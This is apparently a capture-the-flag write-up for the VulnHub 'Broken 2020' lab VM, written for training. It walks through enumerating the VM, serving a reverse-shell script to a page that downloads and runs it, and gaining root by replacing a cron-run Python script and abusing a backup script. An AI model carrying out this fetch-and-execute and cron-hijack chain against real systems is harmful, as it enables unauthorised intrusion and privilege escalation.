VulnHub Link: https://www.vulnhub.com/entry/broken-2020-1,470/
Description:
Level : beginner for user flag and intermediate for root flag.No exploit, custom exploitation is need.Work on virtualbox.This works better with VirutalBox rather than VMware
So as always let’s run nmap to scan the opened ports :
> nmap -sC -sV 192.168.56.127
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 17:19 Romance Standard Time
Nmap scan report for 192.168.56.127
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA)
| 256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA)
|_ 256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Coming Soon
MAC Address: 08:00:27:40:46:ED (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
We have 2 opened ports
22 (ssh) ==>OpenSSH 7.9p1
80 (http) ==> Apache httpd 2.4.38
Let’s see what we have on the http server (webpage)
a HTML page that has nothing, let’s run dirbuster
Dirbuster has found a folder “/cms/”, by browsing this page we have an installation message !
So before I click on install I start my BurpSuite to intercept the requests maybe we can find something …
Not that much of information’s … but in the page it says click here to go to the website
and it says click here to go to somewhere (not sure about what was written) ….
The main page (index.php) has changed/hacked ! and if I go back to cms folder it gives me another page …
and this is the first flag ! and nothing was clear to this part …
So I had to run again dirbuster and it gives me another directory under to “/cms/” folder which is “/cc/” ==> http://192.168.56.127/cms/cc/
This php page has 2 input fields and a hack button
and if you enter any valid IP and port it says “Server can’t reach the script”
So to know what going on in backgrounds when I click hack, I had to start a Local HTTP Server using python on port 8080, After setting up my local server and put my local Ip on Server IP
“http://192.168.56.127/cms/cc/?ip=192.168.56.1&port=8080"
192.168.56.1 ==> is my local IP
8080 ==> is my SimpleHTTPServer port :p
I noticed something in my Python local server
192.168.56.127 - - [29/Apr/2020 17:24:51] "GET /e8114ea84d875ef54a6f5a1c4d8e5f20.sh HTTP/1.0" 404 -The website was trying to download a file “e8114ea84d875ef54a6f5a1c4d8e5f20.sh” from my local server ! …
So now I’ll create that file with a reverse shell code inside,start my listener and and repeat the hack operation
http://192.168.56.127/cms/cc/?ip=192.168.56.1&port=8080and after few seconds I had my reverse shell :D
Now for the R00T part :D
I ran some Linux enumeration scripts as “LinEnum” and “Linpeas” but didn’t find that much … So I had to run pspy64 to see if there is any cronjobs …
2020/04/29 16:21:00 CMD: UID=0 PID=10 |
2020/04/29 16:21:00 CMD: UID=0 PID=1 | /sbin/init
2020/04/29 16:21:01 CMD: UID=0 PID=9653 | /usr/sbin/CRON -f
2020/04/29 16:21:01 CMD: UID=0 PID=9652 | /usr/sbin/cron -f
2020/04/29 16:21:01 CMD: UID=0 PID=9654 | /usr/sbin/CRON -f
2020/04/29 16:21:01 CMD: UID=0 PID=9655 | /usr/sbin/CRON -f
2020/04/29 16:21:01 CMD: UID=0 PID=9656 | /bin/sh -c python /root/check.py
2020/04/29 16:21:01 CMD: UID=108 PID=9658 | /bin/sh /usr/share/sendmail/sendmail cron-msp
2020/04/29 16:21:01 CMD: UID=0 PID=9657 | /bin/sh -c sudo -u alice python /home/alice/script/log.py
2020/04/29 16:21:01 CMD: UID=0 PID=9659 | sudo -u alice python /home/alice/script/log.pyand we are having some :D
So as first start we read the file “/home/alice/script/log.py”
#!/usr/bin/python2.7
import requests
import os
import datetime"""
#Juste in case I want stop this script remotlyr = requests.get("https://pastebin.com/raw/9vzu2CA5")cmd=str(r.text)
check ="stopit"
if check == cmd :
os.system('cp /home/alice/script/log.py /home/alice/script/log.bak')"""path="/var/log/apache2"
dir = os.listdir(path)
date = str(datetime.datetime.now())
for logfile in dir :
clear = open(path+"/"+logfile, "w")
clear.truncate(0)
clear.close()
logfile = open("/home/alice/script/clear.log","w")
logfile.write("last clear apache log "+date)
logfile.close()
nothing interesting in that file, but if you go to the folder /home/alice/ you’ll notice that the directory script is writable
Which means we can rename/delete the log.py file and create a new file having the same name but with our reverse shell code :D
And don’t forget the listener on the specified port … and after one minute (the Cron task runs the python file each one minute)
The backup folder wasn’t there before so I had to check from where this folder comes !
and I found something interesting in “/back/” (a folder that the developer forget to delete)
So I had to read the files one by one I’ll start with the file check.py
This python file is checking how many files are in the folder /home/alice/script/ if there is more than 2 it calls another file which is /root/hack.sh
The “hack.sh” file move the folder backup from root to Alice’s home dir (That what interest us) …,So by going back to the file backup.py
the backup.py read the content of “/home/alice/backup/path.txt” and copy it to the same directory ( “/home/alice/backup/”) !
So how to exploit that ?! easy …
We add /root/ in the file “path.txt” and it will copy all the files inside the root folder to our alice backup folder … ,We wait a one minute till the crons run …
and these are the flags (I forget to show each step of getting it but you can only search for flag.txt file) :
1st flag: {FLAG1:**Defacement**}
2nd flag: {FLAG2:**Robing the rober**}
3rd flag: {FLAG3:**Power of snak**}
Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeup’s and tool’s can be found here:
https://github.com/ab2pentest
